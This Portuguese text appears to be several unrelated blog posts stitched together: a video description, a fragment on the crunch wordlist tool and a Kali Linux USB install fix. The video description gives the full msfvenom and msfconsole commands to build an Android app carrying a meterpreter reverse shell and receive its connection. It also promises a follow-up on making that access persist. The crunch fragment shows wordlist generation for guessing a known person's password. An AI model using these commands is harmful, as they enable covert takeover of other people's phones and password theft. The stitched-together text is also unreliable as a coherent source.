Gente, nesse video eu mostro como com poucos comandos você pode explorar um Android na versão 6.0.
O video não tem intenção de ensinar ou induzir ninguém a invadir a privacidade de terceiros, mas sim demonstrar que falhas podem ser exploradas.
Usei apenas o msfvenom sem opções de encoder, arquitetura ou outros, basicamente apenas um exploit gerado pelo kali e que me deu acesso de forma reversa ao Android.
Aparelho : Moto G segunda Geração com android 6.0 com ultima atualização de segurança instalado.
Comandos usado neste video…
Criar o exploit, substitua ip pelo seu ip, porta pela devida porta e de o nome do app: msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=PORTA -o app.apk
Para estabelecer conexão : msfconsole
use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost IP_KALI
set lport porta
exploit -j ou run ou somente exploit…
Bom, por hoje é só, logo mais mostro como deixar este exploit como algo que inicia todas as vezes que o dispositivo for ligado, obtendo assim um acesso monstro ao Android….rsrs
abraços
-t= Inseri uma patente e modifica como entendermos. Sabemos que uma password é composta de um nome, neste caso maria mas de seguida é inserido 4 dígitos que não sabemos.
Veja que nesse parâmetro do crunch, apliquei uma geração com o “charset”, uma wordlist ja pré-determinada, como “mixalpha” (letras maiúsculas e minúsculas).
Aqui foram alguns dos comandos e parâmetros do crunch, saiba mais aqui.
Diante do erro “Nenhuma unidade de CD-ROM comum foi detectada” a resolução é:
1– esse erro ocorre geralmente, com pendrive.
2– ao aparecer essa tela de erro, retire o pendrive e coloque novamente e pressione enter.
3– se o erro permanecer, retire o pendrive novamente, sem desligar ou reiniciar o computador.
4– se estiver no windows, use o Daemon Tools para emular a ISO (se for windows 10 ele ja emula dando um duplo clique na ISO), formate o pendrive clicando com botão direito, e depois copie os arquivos de dentro da ISO para o pendrive, ao terminar, plugue novamente no computador que está sendo instalado o kali, e pressione enter novamente.
5– se estiver no linux, Primeiro acesse o terminal como root:
su
Agora vamos acessar o /media:
# cd /media
E então crie um diretório onde deverá ser armazenado a nossa ISO:
# mkdir /diretorio_ISO
Agora é fácil montar a imagem .ISO, basta usar o comando abaixo. O comando “mount” que irá montar o nome da sua imagem ISO sem as aspas, o local onde está seu diretório para armazenar a ISO, o parâmetro “-o” como opção de montar tudo no fstab e o loop que executa o mount até o fim da ISO:
# mount “sua_Imagem.iso” /media/diretorio_ISO -o loop